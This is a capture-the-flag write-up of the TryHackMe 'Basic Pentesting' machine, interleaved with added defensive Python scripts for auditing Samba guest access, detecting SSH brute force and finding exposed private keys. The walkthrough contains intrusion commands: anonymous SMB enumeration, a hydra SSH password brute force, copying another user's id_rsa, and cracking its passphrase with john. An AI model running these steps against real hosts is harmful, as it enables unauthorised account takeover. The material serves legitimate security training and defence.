# PLATFORM . THM
# CTF NAME . Basic Pentesting
# DESCRIPTION . This is a machine that allows you to practise web app hacking and privilege escalation
# DIFFICULTY . Easy
# CTF LINK . https://tryhackme.com/room/basicpentestingjt

  • I started by scanning the target machine to get a better understanding of the environment.
sudo nmap -sSVC -T5 10.10.245.193 -p- -oN ~/workspace/ctf_workspace/basicpt
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_ 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2023-11-17T07:33:09-05:00
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2023-11-17T12:33:09
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
  • While the scan was running, I checked whether a web server was running on port 80, and there was one.

  • However, not much information is given to us.

Undergoing maintenance
Please check back later
  • Checking the page source, we get another piece of information:
<!-- Check our dev note section if you need to know what to work on. -->
  • This made me try navigating to /dev and /development. The latter worked.

  • The content of this page is two files, dev.txt and j.txt.

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.
-K
  • From these two notes, we get valuable information.

  • From dev.txt, we find out that the web server is Apache and that SMB has been configured on the host, along with some software (the Struts example mentioned in the note) that we are not sure is actually installed on the target.

  • On the other side, j.txt reveals that J has (or had, if it was changed in the meantime) a really weak password.

  • Going back to the nmap scan, the most attractive thing to me was the SMB server.

  • I checked for available shares using

smbclient -L \\10.10.245.193

and entered anonymous as the password when asked.

Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
  • There is a share called Anonymous.

  • We can connect to it using smbclient \\\\10.10.245.193\\Anonymous with anonymous as the password.

smb: \> ls
. D 0 Thu Apr 19 20:31:20 2018
.. D 0 Thu Apr 19 20:13:06 2018
staff.txt N 173 Thu Apr 19 20:29:55 2018
14318640 blocks of size 1024. 11093564 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> exit
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!)
-Kay
  • This file is important: it reveals the two users behind the notes above, jan and kay.
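The scan above shows a guest-accessible share and SMB signing disabled, which is what makes the Anonymous share readable without credentials. The following audit script is an added example for this write-up, not part of the original post or of the target's configuration: it parses a Samba smb.conf and flags the settings that produce exactly that exposure (guest-accessible shares, `map to guest`, non-mandatory `server signing`). The two smb.conf texts embedded below are constructed for illustration; the share and path names are made up.

```python
"""Audit an smb.conf for settings that allow anonymous share access.

Added example for this write-up (not the target's real configuration).
The sample configs below are constructed; share names and paths are made up.
"""
import re

# Samba accepts several spellings for the same parameter; normalise them.
SYNONYMS = {"public": "guest ok", "writeable": "writable", "write ok": "writable"}


def parse_smb_conf(text):
    """Return {section: {param: value}} with lower-cased, normalised keys."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):   # blank or comment line
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:                                          # new [section]
            current = m.group(1).strip().lower()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = (s.strip().lower() for s in line.split("=", 1))
        key = SYNONYMS.get(re.sub(r"\s+", " ", key), key)
        sections[current][key] = value
    return sections


def is_true(value, default=False):
    """Samba boolean: yes/true/1 are true; missing falls back to the default."""
    return default if value is None else value in ("yes", "true", "1")


def audit_smb_conf(text):
    """Return a list of (section, finding) tuples describing anonymous-access risks."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []
    if g.get("map to guest", "never") != "never":
        findings.append(("global", f"map to guest = {g['map to guest']}: failed logins are mapped to guest"))
    if g.get("server signing", "default") != "mandatory":
        findings.append(("global", "server signing is not mandatory: clients may skip SMB signing"))
    for name, params in conf.items():
        if name == "global" or not is_true(params.get("guest ok")):
            continue
        # Either 'writable = yes' or 'read only = no' makes the share writable.
        writable = is_true(params.get("writable")) or (
            "read only" in params and not is_true(params["read only"], True))
        mode = "read/write" if writable else "read-only"
        findings.append((name, f"guest ok = yes: {mode} access without credentials"))
    return findings


# Constructed config resembling what the scan results suggest: a guest share,
# guest mapping for bad users, signing left at the standalone-server default.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[Anonymous]
   path = /srv/samba/anonymous
   browseable = yes
   public = yes
   writable = yes

[staff]
   path = /srv/samba/staff
   valid users = @staff
   guest ok = no
"""

# The same layout with the anonymous path closed off.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Never
   server signing = mandatory

[Anonymous]
   path = /srv/samba/anonymous
   browseable = no
   guest ok = no
   valid users = @staff

[staff]
   path = /srv/samba/staff
   valid users = @staff
   guest ok = no
"""

if __name__ == "__main__":
    for section, finding in audit_smb_conf(WEAK_SMB_CONF):
        print(f"[{section}] {finding}")
```

Run it against a real `/etc/samba/smb.conf` by reading the file into `audit_smb_conf`; an empty result means no share is reachable as guest and signing is enforced. The parser deliberately treats only lines that start with `#` or `;` as comments, because Samba does the same.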

  • Since we already know Jan's password is weak, let's try brute-forcing SSH for this user.

hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.245.193 ssh

NOTE: it takes ~10 minutes to find the password.

  • Once we find the password, we are able to SSH into the box.
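A ten-minute password-guessing run against sshd leaves a very recognisable trace in the host's auth log: a burst of `Failed password` lines from one source, followed by an `Accepted` line from the same source. The detector below is an added example for this write-up, not part of the original post; it reads sshd log lines, counts failures per source address in a sliding window, and raises a second, higher-severity alert when a login succeeds after such a burst. The log lines are constructed to mimic the scenario above (hostname `basic2`, user `jan`, source `10.0.0.5`); the threshold and window are tunable assumptions.

```python
"""Detect SSH password-guessing bursts and success-after-burst in sshd logs.

Added example for this write-up; the log lines below are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches the standard sshd auth log line (syslog timestamp, host, sshd[pid]).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2\b"
)


def parse_line(line, year=2023):
    """Return (timestamp, result, user, ip) or None for lines we do not care about.
    Syslog timestamps carry no year, so the caller supplies one (assumption)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Return alerts in log order.

    'burst': an ip reached `threshold` failures within `window_seconds`.
    'success_after_burst': a later Accepted line from an ip that already burst,
    which is the strongest indication that a guessed password worked.
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    total = defaultdict(int)      # ip -> failures seen so far
    flagged = set()               # ips that already produced a burst alert
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            total[ip] += 1
            q = recent[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()           # drop failures that fell out of the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"kind": "burst", "ip": ip, "user": user, "failures": len(q)})
        elif ip in flagged:
            alerts.append({"kind": "success_after_burst", "ip": ip, "user": user,
                           "failures": total[ip]})
    return alerts


# Constructed sample: 12 guesses for jan from one address, then a success,
# plus an ordinary user (kay) who mistypes once and then logs in normally.
SAMPLE_AUTH_LOG = [
    f"Nov 17 07:40:{i:02d} basic2 sshd[{1200 + i}]: Failed password for jan "
    f"from 10.0.0.5 port {40000 + i} ssh2"
    for i in range(12)
] + [
    "Nov 17 07:40:15 basic2 sshd[1213]: Accepted password for jan from 10.0.0.5 port 40012 ssh2",
    "Nov 17 07:41:02 basic2 sshd[1220]: Failed password for kay from 10.0.0.9 port 50001 ssh2",
    "Nov 17 07:41:10 basic2 sshd[1221]: Accepted publickey for kay from 10.0.0.9 port 50002 ssh2: ED25519 SHA256:constructed",
    "Nov 17 07:41:10 basic2 sshd[1221]: pam_unix(sshd:session): session opened for user kay by (uid=0)",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

Feed it a real file with `detect_bruteforce(open("/var/log/auth.log"))`; lines that are not login results (session open/close, PAM messages) are skipped by the regex. The `success_after_burst` alert is the one worth paging on, since a burst alone may just be a noisy scanner.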

  • I looked around, did some manual enumeration and looked for privilege escalation paths.

  • Using cat /etc/passwd | cut -d ":" -f 1, I noticed that the only two users on the system are jan and kay.

  • I navigated to /home/kay and noticed that, besides the pass.bak file that I could not read, I could enter .ssh and read the id_rsa key.

  • With the key copied to my machine, I tried SSHing into the box using kay's key with chmod 600 id_rsa && ssh -i id_rsa kay@ip, but I was asked for a passphrase.

  • I used python3 /opt/john/run/ssh2john id_rsa > id_rsa.hash to convert the key into a format john can handle, then ran john --wordlist=/usr/share/wordlists/rockyou.txt against the file, which revealed beeswax as the passphrase.

  • After being able to SSH in as kay, I was able to read the pass.bak file from his home, which revealed the final flag.
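The privilege escalation above only works because kay's home directory is traversable by other users, the private key is readable by them, and its passphrase is weak. The audit below is an added example for this write-up, not part of the original post or of the target: it walks a home-directory root, flags world-accessible homes and group/other-readable private keys, and checks whether an OpenSSH-format key has a cipher set at all (a key with cipher `none` has no passphrase and needs no cracking). It builds its own fixture in a temporary directory with constructed key headers that are not usable keys; the user names `a` and `b` are made up.

```python
"""Audit home directories for exposed SSH private keys.

Added example for this write-up. The fixture below is constructed: the key
files contain only a valid OpenSSH header, not real key material.
"""
import base64
import os
import stat
import struct
import tempfile
from pathlib import Path

KEY_NAMES = ("id_rsa", "id_dsa", "id_ecdsa", "id_ed25519")
PEM_START = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_END = "-----END OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\x00"


def openssh_cipher(data: bytes):
    """Return the cipher name recorded in an OpenSSH-format private key
    ('none' means no passphrase), or None if the data is not in that format."""
    text = data.decode("ascii", "ignore")
    if PEM_START not in text or PEM_END not in text:
        return None
    body = text.split(PEM_START, 1)[1].split(PEM_END, 1)[0]
    raw = base64.b64decode("".join(body.split()))
    if not raw.startswith(MAGIC):
        return None
    off = len(MAGIC)
    (n,) = struct.unpack(">I", raw[off:off + 4])   # length-prefixed cipher name
    return raw[off + 4:off + 4 + n].decode()


def audit_homes(root: Path):
    """Return (path, finding) tuples for every exposure found under `root`."""
    findings = []
    for home in sorted(p for p in root.iterdir() if p.is_dir()):
        mode = stat.S_IMODE(home.stat().st_mode)
        if mode & 0o005:     # other users can enter or list the home directory
            findings.append((str(home), f"home directory is world-accessible (mode {mode:o})"))
        ssh_dir = home / ".ssh"
        if not ssh_dir.is_dir():
            continue
        for key in ssh_dir.iterdir():
            if key.name not in KEY_NAMES:
                continue
            kmode = stat.S_IMODE(key.stat().st_mode)
            if kmode & 0o077:
                findings.append((str(key), f"private key readable by group/other (mode {kmode:o})"))
            if openssh_cipher(key.read_bytes()) == "none":
                findings.append((str(key), "private key has no passphrase"))
    return findings


def make_key(cipher: str) -> bytes:
    """Constructed OpenSSH key header with the given cipher; NOT a usable key."""
    raw = MAGIC + struct.pack(">I", len(cipher)) + cipher.encode()
    b64 = base64.b64encode(raw).decode()
    return f"{PEM_START}\n{b64}\n{PEM_END}\n".encode()


def build_fixture() -> Path:
    """Create two constructed home directories in a temp dir and return the root."""
    root = Path(tempfile.mkdtemp(prefix="home-audit-"))
    # user "a": traversable home, world-readable key, no passphrase
    a = root / "a"
    (a / ".ssh").mkdir(parents=True)
    (a / ".ssh" / "id_rsa").write_bytes(make_key("none"))
    os.chmod(a / ".ssh" / "id_rsa", 0o644)
    os.chmod(a, 0o755)
    # user "b": locked-down home, owner-only key, passphrase-protected
    b = root / "b"
    (b / ".ssh").mkdir(parents=True)
    (b / ".ssh" / "id_ed25519").write_bytes(make_key("aes256-ctr"))
    os.chmod(b / ".ssh" / "id_ed25519", 0o600)
    os.chmod(b, 0o700)
    return root


if __name__ == "__main__":
    for path, finding in audit_homes(build_fixture()):
        print(f"{path}: {finding}")
```

On a real host, call `audit_homes(Path("/home"))` as root. The fix for each finding is the one the write-up implies: `chmod 700` on the home directory, `chmod 600` on the key, and a passphrase that a wordlist will not reach, or better, a key that never leaves the workstation it was generated on.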